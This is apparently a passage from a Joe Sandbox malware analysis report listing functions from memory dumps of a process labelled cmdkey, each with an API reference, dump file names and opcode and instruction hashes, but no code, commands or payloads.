                                                                                                                                                                                                                                                                • Opcode ID: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                                                                                                                                                                                                                                • Instruction ID: 5d76b4e2c254010c9fd24d5c6f831370294178c68da58fd9e7b66884fdb54ef1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51a1490dc5bbe649167750b4b5e61c81b200366f79915bb8788afccde69a0b38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431CA75A01648AFDB14DF98C840EEF77F9EF88714F108219F919AB344D734A911CBA5
                                                                                                                                                                                                                                                                Function 03029670 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(03011E3E,?,0302813F,00000000,00000004,00003000,?,?,?,?,?,0302813F,03011E3E), ref: 03029738
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                • Opcode ID: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                                                                                                                                                                                                                                • Instruction ID: 0e545728ce4a4a9f240e5daee8a90ab2075fa9465c42c04d6c8c207aba84d267
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84211CB9A01718AFDB14DF98CC41EEF77B9EF88700F108109F918AB240D734A911CBA5
                                                                                                                                                                                                                                                                Function 03029460 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                • Opcode ID: e27229d037b06a3256107adad20ad3048269b43c53fba6a8d67c1a7a5e616ca3
                                                                                                                                                                                                                                                                • Instruction ID: 7eccdaf6af5686bd8f94c12e686e57deaf94bb5a5ac6bd6e21cfc62f6dc2128d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e27229d037b06a3256107adad20ad3048269b43c53fba6a8d67c1a7a5e616ca3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E119179A417146ED620EA64CC41FEF77ACEF84714F108149F918AB280DB7479028BB5
                                                                                                                                                                                                                                                                Function 03029500 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03029534
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                                                                                                                                                                                                                                • Instruction ID: 2b747365507a6ba6b5ef5bf3a8d181cf71ba3aa107fca58e392b4bceb44d9e0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BE0467A240614BBD620EA59DC00FDB7BACDFC5720F518415FA0CAB281CA74B915C7E4
                                                                                                                                                                                                                                                                Function 038F4260 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 49cc302f21cf85ed1f1f2025952715bd67b009eceb682e7db5c1c50df6e61e0a
                                                                                                                                                                                                                                                                • Instruction ID: 3cb8929727ae7ce065afc16ece6394e1943dd5398b06b454feb4daa2c0721a9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49cc302f21cf85ed1f1f2025952715bd67b009eceb682e7db5c1c50df6e61e0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59900231709904169540B15849C4546405597E0301B51C415E4518558CCB2489566361
                                                                                                                                                                                                                                                                Function 038F4570 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: f1b47d687e28bbafe0e5ba78df23cca00c72dc2c78d8aa9aba6b103a4670e2ae
                                                                                                                                                                                                                                                                • Instruction ID: 3f1de45d7179519550ef01c78a2e520822fbac0043946b0b700f6a3257dd72c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b47d687e28bbafe0e5ba78df23cca00c72dc2c78d8aa9aba6b103a4670e2ae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6900261705604464540B1584944406605597E1301391C519A4648564CC7288855A269
                                                                                                                                                                                                                                                                Function 038F34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 19e62f9c95ea75296fab43748dbddb3d9207c9eae45ba1d3b70ec9dcc17cd2d6
                                                                                                                                                                                                                                                                • Instruction ID: 64f9eb123757472e48b57bdd4d67e1d899c4158f053220e894d2cc0a7b39b862
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19e62f9c95ea75296fab43748dbddb3d9207c9eae45ba1d3b70ec9dcc17cd2d6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4890023170960806D500A1584654706105587D0301F61C815A451856CDC7A5895175A2
                                                                                                                                                                                                                                                                Function 038F2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: e7cc50e235c7a8a0f028212071e194374da0a6e414f4279bdbfb373b645f00f6
                                                                                                                                                                                                                                                                • Instruction ID: f58b4fa4f4ca5ddcc4ca01a69380657b393b3ba9a2d2b54dc06503d9e4a2bd49
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7cc50e235c7a8a0f028212071e194374da0a6e414f4279bdbfb373b645f00f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C90023130550C46D500A1584544B46005587E0301F51C41AA4218658DC725C8517521
                                                                                                                                                                                                                                                                Function 038F2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 3177d7f722ea9979509f1b6f1e0f2c2352a29d52381328df272a8304d73d979c
                                                                                                                                                                                                                                                                • Instruction ID: 11cf411dedc77961d5cd9024c858cafd5178638e166ce1ea6e8df672466c78b2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3177d7f722ea9979509f1b6f1e0f2c2352a29d52381328df272a8304d73d979c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D90023130558C06D510A158854474A005587D0301F55C815A851865CDC7A588917121
                                                                                                                                                                                                                                                                Function 038F2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 56990efd2d82d8828b2207fe3a554f1834c9a10c5c7dc8a82028c0486cddeba7
                                                                                                                                                                                                                                                                • Instruction ID: 42de5d2eea420fc0fd3435ac039a382aa459147f2b46f40d97fa1d52a321caec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56990efd2d82d8828b2207fe3a554f1834c9a10c5c7dc8a82028c0486cddeba7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3090023130550806D500A5985548646005587E0301F51D415A9118559EC77588917131
                                                                                                                                                                                                                                                                Function 038F2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 7a6d0cf0ec08256042283e3bc6b2c8eef01ae602f64c5bdbd49993339e76e89e
                                                                                                                                                                                                                                                                • Instruction ID: 1bfd945b5d440c49bb02d7a1df51eee2db2bd12ed801fe0305cb0404485c115e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a6d0cf0ec08256042283e3bc6b2c8eef01ae602f64c5bdbd49993339e76e89e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2890023130954C46D540B1584544A46006587D0305F51C415A4158698DD7358D55B661
                                                                                                                                                                                                                                                                Function 038F2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 6ebea05248c1f0a58c7eb97b5f1a9bcbf688c8f1625bbd6f6cca9eaca83492e3
                                                                                                                                                                                                                                                                • Instruction ID: 6f93fd942b5379c76305414916d1e28600e7c605c10c06ed4679844084208d4b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ebea05248c1f0a58c7eb97b5f1a9bcbf688c8f1625bbd6f6cca9eaca83492e3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5790023130550C06D580B158454464A005587D1301F91C419A4119658DCB258A5977A1
                                                                                                                                                                                                                                                                Function 038F2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: d1a4d828ba9aa68c6de03667a76de1173a6d0c4488a84a0c19cecdf6302e5c0f
                                                                                                                                                                                                                                                                • Instruction ID: 9f605c562c2e137b59141e347d6eae1d1309460af002f9385fdb1047a6bbc865
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1a4d828ba9aa68c6de03667a76de1173a6d0c4488a84a0c19cecdf6302e5c0f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B900261306504074505B1584554616405A87E0301B51C425E5108594DC63588917125
                                                                                                                                                                                                                                                                Function 038F2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 3eb1f8ad35137d0cef6a23e1618d10e5f7e20f5be48342495c5da02572e9e127
                                                                                                                                                                                                                                                                • Instruction ID: 95abd52c05e5b008d086aa6aa717be2c752ff84325d0e0c70301e994dbfb665c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb1f8ad35137d0cef6a23e1618d10e5f7e20f5be48342495c5da02572e9e127
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5490023170950C06D550B1584554746005587D0301F51C415A4118658DC7658A5576A1
                                                                                                                                                                                                                                                                Function 038F2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 4338b4375f8c62b078d8c97e70e2141ad6338374194c3e646de044c66c2be012
                                                                                                                                                                                                                                                                • Instruction ID: a36ad057788e5ff65af3fea030d19a4af9ad7e1200709ea7f41a685542d6e2d9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4338b4375f8c62b078d8c97e70e2141ad6338374194c3e646de044c66c2be012
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A900225325504060545E558074450B049597D6351391C419F550A594CC73188656321
                                                                                                                                                                                                                                                                Function 038F29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 4c256af7d459ac5dd5760893855f17c73adc95515edd9e8c77f7a1c2c106c9ad
                                                                                                                                                                                                                                                                • Instruction ID: ec7b7506ef11dedac15bea58ddcde94931fe7f86d41b9b1757bd206d298772f1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c256af7d459ac5dd5760893855f17c73adc95515edd9e8c77f7a1c2c106c9ad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E900435315504070505F55C074450700D7C7D5351351C435F510D554CD731CC717131
                                                                                                                                                                                                                                                                Function 038F38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 85b2d19ee19a79de514ec8cfbe847cb44fdf9c613426ff02e477dcb061bcec38
                                                                                                                                                                                                                                                                • Instruction ID: 90d37f50ab20fc5f7a80ae8ca44d9531685c6927d0342317c4ed3197ef8df308
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85b2d19ee19a79de514ec8cfbe847cb44fdf9c613426ff02e477dcb061bcec38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D90022134955506D550B15C45446164055A7E0301F51C425A4908598DC66588557221
                                                                                                                                                                                                                                                                Function 038F2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: adcff098e38d8c878fdc58be3fb8dde79b11e8b62e926aba008e305300c451d3
                                                                                                                                                                                                                                                                • Instruction ID: 2c34ffefb42583ab5ba9797a00e941f4db438811b369efa3ae795b68e2219ac5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adcff098e38d8c878fdc58be3fb8dde79b11e8b62e926aba008e305300c451d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45900221315D0446D600A5684D54B07005587D0303F51C519A4248558CCA2588616521
                                                                                                                                                                                                                                                                Function 038F2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 8f10724507b1e84ccdcb0896549fb31d1f498f48869d01aaa167ab11e18e7941
                                                                                                                                                                                                                                                                • Instruction ID: 29f107af888b13f5ab3dad4f4771c56cd848bae95c4a4615e3d9e8626a85b085
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f10724507b1e84ccdcb0896549fb31d1f498f48869d01aaa167ab11e18e7941
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88900221705504464540B16889849064055ABE1311751C525A4A8C554DC66988656665
                                                                                                                                                                                                                                                                Function 038F2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
